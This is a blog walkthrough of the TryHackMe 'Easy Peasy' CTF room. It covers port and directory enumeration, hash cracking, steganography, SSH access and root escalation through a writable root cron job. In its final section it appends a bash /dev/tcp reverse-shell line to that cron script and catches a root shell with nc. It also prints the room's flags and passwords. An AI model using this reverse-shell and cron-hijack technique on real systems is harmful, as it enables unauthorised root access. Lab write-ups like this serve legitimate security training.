TryHackMe | Easy Peasy
This is one (of many) walkthroughs for the EasyPeasy CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws throughout this article. As you will see, it was not so easy for me to solve this challenge 😅. I had to sweat a bit to accomplish the mission.
Enumeration through Nmap
This one seemed different from the others I’ve been doing so far. A quick nmap command returned a couple of open ports; however, that was not enough to answer the questions at hand.
┌──(root㉿kali)-[~]
└─$ nmap -sCV $IP-ADDRESS
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-10 15:21 UTC
Nmap scan report for ip-10-10-44-157.eu-west-1.compute.internal (10.10.44.157)
Host is up (0.0024s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
MAC Address: 02:00:81:F5:B8:01 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.56 seconds
With that in mind, I tried a more comprehensive command that would include a (way) bigger range of ports. This one took a long while to finish…
┌──(root㉿kali)-[~]
└─$ nmap -p- $IP-ADDRESS
After the command was finished, I gathered more information about the ports through a more sophisticated nmap command:
┌──(root㉿kali)-[~]
└─$ nmap -sCV -p80,6498,65524 $IP-ADDRESS
- How many ports are open? 3
- What is the version of nginx? 1.16.1
- What is running on the highest port? Apache
Compromising the machine
With no more information available, I relied on gobuster to retrieve more useful information to solve the next questions.
┌──(root㉿kali)-[~]
└─$ gobuster dir -u http://$IP-ADDRESS -x html,txt,php,js,py -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$IP-ADDRESS
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt,php,js,py
[+] Timeout: 10s
===============================================================
2023/02/17 18:29:09 Starting gobuster
===============================================================
/hidden (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
===============================================================
2023/02/17 18:29:12 Finished
===============================================================
I kept running gobuster against each of the supposedly hidden directories (hidden → whatever) until I found an MD5 hash in the HTML source code. Using CyberChef, I quickly found the first flag of the CTF.
4. Using GoBuster, find flag 1: flag{f1rs7_fl4g}
Just in case, I enumerated the path where I had found the flag. 🤓 Nothing came out. From this point, I couldn’t carry on with the main web server; there was another web server left to enumerate.
┌──(root㉿kali)-[~]
└─$ gobuster dir -u http://$IP-ADDRESS:65524 -x html,txt,php,js,py -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$IP-ADDRESS:65524
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,js,py,html
[+] Timeout: 10s
===============================================================
2023/02/17 18:40:33 Starting gobuster
===============================================================
...
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2023/02/17 18:40:36 Finished
===============================================================
Even though the other service also had a robots.txt available (with no information in it), this one was different: it contained something that would be useful.
At first, I tried a curl request with this custom User-Agent, but without any success. The HTML source code was exactly the same as the original one (you can use Diffchecker to compare results).
The second flag was a bit difficult, mostly perhaps due to my lack of knowledge (and creativity). I quickly ran john to identify the hash; based on the output, it seemed to be an MD5 hash. I checked CrackStation to see if its database had already cracked the hash in the past. No luck here 🤔. Last, but not least, I tried md5hashing and got lucky 🎉. Suggestions are welcome here! Perhaps next time I can get more creative while cracking hashes. Lesson learned: try different online cracking tools, as they have different databases. One of them might have what you are looking for.
5. Further enumerate the machine, what is flag 2? flag{1m_s3c0nd_fl4g}
On the main page on port 65524, there was a “Fl4g 3” reference with the actual flag.
6. Crack the hash with easypeasy.txt, what is the flag 3? flag{9fdafbd64c47471a8f54cd3fc64cd312}
By inspecting the HTML source code of the same page, I found some hidden text that suggested the use of a baseXX decoding algorithm. After several tries with base[32,45,58,62], I found something that looked like a path. Blame me for brute-forcing the different base algorithms 😙
7. What is the hidden directory? /n0th1ng3ls3m4tt3r
Suddenly, I entered the Matrix 😎! Same thing, different page here. I checked the source code and got another hash to crack. John to the rescue!
┌──(root㉿kali)-[~]
$ echo "$MY-HASH" > hash
$ john hash --wordlist=$downloaded-task-file-password.dic
Warning: detected hash type "gost", but the string is also recognized as "HAVAL-256-3"
Use the "--format=HAVAL-256-3" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "Panama"
...
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2023-02-17 19:20) 50.00g/s 204800p/s 204800c/s 204800C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably
8. Using the wordlist provided to you in this task, crack the hash. What is the password? mypasswordforthatjob
Finding the SSH password was tricky. At this point, I didn’t have any information available, so I tried several things in order to achieve the final result.
Use exploit-db to find any exploit for the version of SSH
From the SSH version, I actually found an exploit for it. However, it didn’t take me anywhere. Besides having to fix some issues with the exploit (missing print syntax and some paramiko issues), the user enumeration didn’t help me proceed with the resolution of the CTF.
Explore vulnerabilities on the ssh version
┌──(root㉿kali)-[~]
$ nmap --script=ssh-* -p6498 $IP-ADDRESS
# nothing really interesting happening here
Nothing here either…
Use cyberchef to convert binary value
It was a bit silly, but I tried anyway. There was some highlighted binary code in the image. I used CyberChef to convert it into a human-readable result. Again, nothing really interesting here.
Explore hidden information in images
After downloading the image from this weird path, I used steghide to extract hidden information. For the passphrase, I used the one extracted previously.
┌──(root㉿kali)-[~]
$ steghide --extract -sf index.jpeg
Enter passphrase: $PASSWORD-EXTRACTED-BEFORE
wrote extracted data to "secrettext.txt".
Hmmmm, interesting: a username and a password (for SSH?). I quickly went to CyberChef and retrieved the password.
9. What is the password to login to the machine via SSH? iconvertedmypasswordtobinary
After connecting through SSH, I got a pretty dangerous message 👮
┌──(root㉿kali)-[~]
$ ssh boring@$IP-ADDRESS -p 6498
*************************************************************************
** This connection are monitored by government offical **
** Please disconnect if you are not authorized **
** A lawsuit will be filed against you if the law is not followed **
*************************************************************************
boring@10.10.102.202's password:
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
boring@kral4-PC:~$ exit
logout
Let’s be quick on this one! From the main directory, I checked the contents of user.txt. It came with a pretty interesting hint, though: it stated that the flag was rotated (or something).
From “rotated” I quickly remembered the Caesar cipher from previous learning (thanks again, THM).
10. What is the user flag? flag{n0wits33msn0rm4l}
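As an added example (not part of the original walkthrough), here is the rotation check the hint points at, done systematically: try all 26 Caesar shifts on the rotated string printed by the box and keep the one that yields a `flag{...}` value. The rotated value is the one shown in the banner above; the function names are my own.

```python
import re

# The rotated user flag exactly as printed by the box's login banner above.
ROTATED_FLAG = "synt{a0jvgf33zfa0ez4y}"

# THM flags follow this shape, so it is a handy oracle for picking the right shift.
FLAG_RE = re.compile(r"^flag\{[^}]*\}$")


def rot(text: str, shift: int) -> str:
    """Caesar-shift ASCII letters by `shift`; digits, braces and other symbols pass through."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def all_rotations(ciphertext: str) -> dict:
    """Every candidate plaintext, keyed by the shift that produces it (0..25)."""
    return {s: rot(ciphertext, s) for s in range(26)}


def find_flag_rotation(ciphertext: str):
    """Return (shift, plaintext) for the rotation that yields flag{...}, or None if none does."""
    for shift, candidate in all_rotations(ciphertext).items():
        if FLAG_RE.match(candidate):
            return shift, candidate
    return None


if __name__ == "__main__":
    # ROT13 is its own inverse, so the same shift recovers the banner text from the flag.
    print(find_flag_rotation(ROTATED_FLAG))   # (13, 'flag{n0wits33msn0rm4l}')
```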
Last, but not least, the root flag was still missing. Since my last CTF, one of the things I check is the file containing all the cron jobs. This file is located at /etc/crontab
┌──(root㉿kali)-[~]
$ ssh boring@$IP-ADDRESS -p 6498
...
$ cat /etc/crontab
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
I quickly checked the permissions of this “secret cron job” and noticed that the boring user could modify it. From gtfo, I found a reverse shell for bash. Feel free to use a different approach.
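As an added example (not from the original walkthrough), this is the same permission check done as a small audit you could run on any host: parse an /etc/crontab-style file, resolve the file each root job executes (honouring `cd DIR &&` prefixes like the one in the output above), and flag files owned by a non-root user or writable by group/others. The crontab text and the stat data are constructed to mirror the finding, not captured from the box.

```python
import os
import re
import stat

# Constructed sample shaped like the crontab shown above (not a capture from the box).
SAMPLE_CRONTAB = """# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
"""
# Constructed stat data, path -> (owner uid, mode): the cron script belongs to uid 1000,
# not root, so that low-privilege user decides what root executes every minute.
SAMPLE_STATS = {"/var/www/.mysecretcronjob.sh": (1000, 0o744),
                "/usr/sbin/anacron": (0, 0o755)}

def parse_system_crontab(text):
    """Return (user, command) for each job line of an /etc/crontab-style file."""
    jobs = []
    for line in text.splitlines():
        fields = line.strip().split(None, 6)   # 5 time fields, user, command
        if len(fields) == 7 and fields[0][0] != "#" and "=" not in fields[0]:
            jobs.append((fields[5], fields[6]))
    return jobs

def referenced_files(command):
    """Resolve file operands of a shell one-liner, honouring 'cd DIR &&' prefixes."""
    cwd, paths = "/", []
    for segment in re.split(r"&&|\|\||;", command):
        tokens = segment.replace("(", " ").replace(")", " ").split()
        if tokens[:1] == ["cd"]:
            cwd = os.path.normpath(os.path.join(cwd, tokens[1])) if len(tokens) > 1 else cwd
            continue
        for tok in tokens[1:]:                 # skip the program name and its flags
            if tok[:1] != "-" and ("/" in tok or tok[:1] == "." or tok.endswith(".sh")):
                paths.append(os.path.normpath(os.path.join(cwd, tok)))
    return paths

def audit(crontab_text, stat_lookup):
    """Flag root jobs whose files are owned by a non-root user or group/world writable.
    stat_lookup(path) returns (uid, mode) or None; build it on os.stat for a real host."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        for path in referenced_files(command) if user == "root" else []:
            uid, mode = stat_lookup(path) or (0, 0)   # unknown path: nothing to judge
            if uid != 0:
                findings.append(f"{path}: run by root but owned by uid {uid}")
            elif mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(f"{path}: run by root but group/world writable")
    return findings
```

On a real host, pass `open("/etc/crontab").read()` and a lookup that returns `(st.st_uid, stat.S_IMODE(st.st_mode))` from `os.stat` for regular files and `None` otherwise.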
┌──(root㉿kali)-[~]
# FROM THE SSH SERVER
$ cd /var/www && echo "bash -c 'exec bash -i &>/dev/tcp/$MY-VM-IP-ADDRESS/4444 <&1'" >> .mysecretcronjob.sh
Finally, all you need to do is start nc and wait for a shell to be spawned.
┌──(root㉿kali)-[~]
# FROM THE ATTACK BOX
$ nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from $IP 51612 received!
bash: cannot set terminal process group (4279): Inappropriate ioctl for device
bash: no job control in this shell
root@kral4-PC:/var/www# whoami
whoami
root
root@kral4-PC:/var/www# cd roo
cd roo
bash: cd: roo: No such file or directory
root@kral4-PC:/var/www# cd root
cd root
bash: cd: root: No such file or directory
root@kral4-PC:/var/www# ls
ls
html
root@kral4-PC:/var/www# cd /root
cd /root
root@kral4-PC:~# ls -la
ls -la
total 40
...
-rw-r--r-- 1 root root 39 Jun 15 2020 .root.txt
root@kral4-PC:~# cat .root.txt
cat .root.txt
# VOILA!
11. What is the root flag? flag{63a9f0ea7bb98050796b649e85481845}
Conclusion
This CTF was not as easy as the name suggested. I struggled to find the answers to some exercises, and some extra research was necessary in order to take full advantage of the tools. Kudos to kral4 for creating this one! 👍